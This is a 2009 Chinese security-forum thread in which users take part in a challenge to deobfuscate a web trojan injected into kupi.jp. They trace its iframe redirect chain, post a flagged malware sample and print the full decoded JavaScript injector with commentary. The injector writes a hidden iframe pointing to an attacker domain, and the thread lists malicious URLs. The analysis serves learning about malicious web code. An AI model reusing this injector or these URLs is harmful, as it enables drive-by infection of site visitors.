查看: 2127|回复: 7
收起左侧

[其它] [第28期]kupi.jp[完成]

[复制链接]
qianwenxiang
发表于 2009-3-18 22:19:33 | 显示全部楼层 |阅读模式
宗旨:
让更多人了解如何解密网马

规则:
1、Hunter不能参加活动
2、必须把所有木马地址全部解出,不完全解密且所发URL之前没有人解出者得到相应步骤加分
3、最好有解密软件日志,如果没有,请发出具体解密过程
4、如果有违反1~2条规则的情况,本帖随即锁定,之后成功解密的作废!
5、锁定后,会重新修改本次的解密地址,并且开帖!
6、为了体现悬赏帖宗旨,昨日解密成功者再次解出今天网址的只能得到对应网址70%经验




解密地址(替换HXXP为HTTP):

hxxp://www.kupi.jp

一次解完(包含解密步骤)=22
分步(即未解完情况):5+4+3+3



注意:这些地址含有恶意软件,可能会危害到您的计算机。请不要直接打开,否则因此造成的一切后果我们概不负责!
参考解密工具:
FreShow(英文)、
Redoce 1.9(中文)、malzilla (英文,但是乃神器也)
http://glacierlk.cn/openlab/jm.htm
参考解密教程:
http://bbs.kafan.cn/viewthread.php?tid=387608
http://bbs.kafan.cn/viewthread.php?tid=220550
http://bbs.kafan.cn/thread-408295-1-1.html


(时限=1天)
250662772
发表于 2009-3-19 13:37:13 | 显示全部楼层
打开首页获得

<IFRAME src="http://www.kupi.jp.30ec3a1fd7620743.longebook.cn/qq.cn/">

打开上面的网址跳转到

http://193.138.172.15/salo/?t=6

解密获得(后面的地址是随机的,每次都不一样)

http://193.138.172.15/salo/??3dcdb61062c531129c371e1f7bbedcf4ef7ee33cb6e0a119c52de89213352f6e21133ec478b926be5b402444a15a7e9e08c2747924e0d00e1f6fc79f9e1bc4ea

内容当然每次也都不一样,但是没法解密,用E>XXTEA解密(参数)解密,软件直接崩溃退出了。
cchao21
发表于 2009-3-19 14:53:47 | 显示全部楼层
跳转到这里这下不去了
http://61.131.89.152/req.php?str1=212374296670541215&t=05412296220010244599731237429667&str2=http://lousecn.cn/
http://lousecn.cn/
250662772
发表于 2009-3-19 15:54:26 | 显示全部楼层
http://193.138.172.15/salo/?19df8ec82856d6e7754110bb6d34cd71a1f4249275f0475330621e8ae1395519a06a734bd70b02c6435aa3f8f6b69c6053cadbe405917615b82fa8aeca226b97
没想到这个就是地址?
1.jpg

样本.rar

10.77 KB, 下载次数: 49

评分

参与人数 1经验 +22 收起 理由
qianwenxiang + 22 加分鼓励

查看全部评分

nanhezzb
头像被屏蔽
发表于 2009-3-20 12:38:11 | 显示全部楼层

回复 2楼 250662772 的帖子

http://www.kupi.jp.30ec3a1fd7620743.longebook.cn/qq.cn/
怎么解出来的呢?我只解出qq.cn/。
高手详细的说下解密过程吧!
328397663
发表于 2009-3-20 12:40:14 | 显示全部楼层

回复 4楼 250662772 的帖子

2009-3-20 12:39:44        检测到威胁: Trojan-Downloader.Win32.Obfuscated.pts        C:\Documents and Settings\Administrator\桌面\样本.rar/样本.exe               
2009-3-20 12:39:44        已删除: Trojan-Downloader.Win32.Obfuscated.pts        C:\Documents and Settings\Administrator\桌面\样本.rar/样本.exe
qianwenxiang
 楼主| 发表于 2009-3-20 17:07:21 | 显示全部楼层

回复 5楼 nanhezzb 的帖子

function McjZFDCzlxb(){};

McjZFDCzlxb.prototype = {
  
getFrameURL : function (){
   
var dlh = document.location.host;
   
return "http" + '://' + ((dlh == '' || dlh == 'undefined') ? this .getRandString() :
   
'') + dlh.replace(/[^a-z0-9.-]/, '.').replace(/\.+/, '.') + "." + this .getRandString
   
() + "." + this .path + this .host;
  }
  ,
setCookie : function (name, value){
   
var d = new Date();
   
d.setTime(new Date().getTime() + 86400000);
   
document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
  }
  ,
cookieName : 'cdeahgbf', cookieValue : 1, install : function (){
   
if (!this .alreadyInstalled()){
      
var s =
      
"<xdxixv3 3s^tCy^lCex=C\'CdJiJsxpxlCa^yx:CnCo^nxeC\'^>J<^iCfCrCaJm^e3 CsxrxcC=3\'^".
      
replace(/[3J\^Cx]/g, '') + this .getFrameURL() +
      
"\'z>z<z/(i0f(r(a0mMe,>0<,/,d0iMv(>(".replace(/[\(M,0z]/g, '');
      
try {
        
var o = document;
        
o.open();
        
o.write(s);
        
o.close();
      }
      
catch (e){
        
document.write('<UhwtUm{l{>9<UbUoUdwy9>w'.replace(/[Uw\{79]/g, '') + s +
        
'<V/RbRoRd!yX>V<!/XhVtXmXlX>g'.replace(/[Vg\!RX]/g, ''))
      }
      
this .setCookie(this .cookieName, this .cookieValue);
    }
  }
  ,
path : "l" + "o" + "n" + String.fromCharCode(103) + "e" + new String("b") + String.
  
fromCharCode(111) + "o" + String.fromCharCode(107) + new String(".") + String.
  
fromCharCode(99) + "n", getRandString : function (){
   
var l = 16, c = '0@1>2:3>4>5>6R7%8@9@a@b%c@dRe%f:'.replace(/[R\:@\>%]/g, ''), o = '';
   
for (var i = 0; i < l; i ++ )o += c.substr(Math.floor(Math.random() * c.length), 1, 1
   
);
   
return o;
  }
  ,
host : '/qq.cn/', alreadyInstalled : function (){
   
return !(document.cookie.indexOf(this .cookieName + '=' + this .cookieValue) ==  - 1
   
);
  }
}
;
var ocho = new McjZFDCzlxb();
ocho.install();



    var dlh = document.location.host;  
   
return "http" + '://' + ((dlh == '' || dlh == 'undefined') ? this .getRandString() :
   
'') + dlh.replace(/[^a-z0-9.-]/, '.').replace(/\.+/, '.') + "." + this .getRandString
   
() + "." + this .path + this .host;
   
   
/* dlh=document.location.host;
             即dlh="www.kupi.jp";
            ((dlh == '' || dlh == 'undefined') ? this .getRandString() : '')
            即dlh=空或者未定义时返回随机字符,否则返回空(此处返回空)
            再连上dlh有效字母数字的数据
            然后连上一个"."
            连上随机字符.this.path+this.host
            path : "l" + "o" + "n" + String.fromCharCode(103) + "e" + new String("b") + String.
            fromCharCode(111) + "o" + String.fromCharCode(107) + new String(".") + String.
            fromCharCode(99) + "n"
            (即longebook.cn)
            host : '/qq.cn/'
            连上即www.kupi.jp.[随机字符].longebook.cn/qq.cn/

            之后调用函数把iframe写入文档,ie会自动加载 */
            


大概就这样了

评分

参与人数 1人气 +2 收起 理由
电影结束了 + 2 再来。。。话说今天你生日

查看全部评分

nanhezzb
头像被屏蔽
发表于 2009-3-22 11:30:17 | 显示全部楼层

回复 7楼 qianwenxiang 的帖子

原来如此啊。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 12:32 , Processed in 0.133678 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表